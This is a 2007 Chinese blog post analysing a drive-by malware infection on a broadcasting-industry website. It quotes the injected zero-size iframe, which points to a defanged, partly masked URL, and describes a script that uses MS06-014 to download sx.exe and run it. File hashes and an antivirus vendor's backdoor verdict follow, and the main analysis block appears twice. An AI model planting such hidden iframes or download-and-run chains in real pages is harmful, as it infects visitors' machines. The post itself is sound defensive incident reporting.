某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
2007-09-06 22:33
190 查看
某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
endurer 原创
2007-09-06 第1版
网站页面被植入代码:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/
hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript脚本,首先输出escape编码的信息:
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞,下载 sx.exe,保存为 %system32%/Cuteqq_Cn.exe,再用 shell.execute来运行。
文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97
使用的是WMP媒体文件的图标
Kasepersky 报为 Packed.Win32.Klone.af
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:sx.exe
病毒名:Backdoor.Win32.Gpigeon.aic
您所上报的病毒文件将在19.39.30版本中处理解决。
endurer 原创
2007-09-06 第1版
网站页面被植入代码:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/
hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript脚本,首先输出escape编码的信息:
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞,下载 sx.exe,保存为 %system32%/Cuteqq_Cn.exe,再用 shell.execute来运行。
文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97
使用的是WMP媒体文件的图标
Kasepersky 报为 Packed.Win32.Klone.af
主 题: | 病毒上报邮件分析结果-流水单号:20070905125954073811 | |
发件人: | "" <send@rising.net.cn> | 发送时间2007.09.05 14:16 |
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:sx.exe
病毒名:Backdoor.Win32.Gpigeon.aic
您所上报的病毒文件将在19.39.30版本中处理解决。
相关文章推荐
- 全球钓鱼网站数量激增,交易、金融证券等行业成“重灾区”
- B2B行业门户网站投资回报及风险控制分析
- 网站运营模式之行业网站分析
- 如何设计好B2B行业网站导航栏,提高易用性
- 网站被挂马的真正原因及挂马原理分析
- 黑客是如何利用Windows2003+IIS6.0的文件名解析漏洞入侵网站挂马的?
- 行业网站十年改变了什么 电商网 -《电子商务世界》打造电子商务大社区
- 总结:行业网站的运营之道
- 拿什么来突破行业网站的“天花板”_风轻轻地吹
- 北京市平谷区交通局网站被挂马
- 国内十大仪表行业网站提名
- 最新作品 WEB设计-婚纱行业网站(程序+平面)
- 计算机病毒中心:大量存在漏洞的Web网站被挂马
- 周杰伦等名人网站频被挂马 粉丝上网需警惕
- 端午小长假谨防挂马网站 病毒模仿杀软骗取钱财
- 通网网站被大规模挂马 15个频道中病毒
- “四川黄页”“成都理工大学”等网站被挂马
- 2013年3月博客行业网站综合影响力排名
- 让McAfee来终结网站被挂马的时代图文教程
- 2013年3月电子杂志行业网站综合影响力排名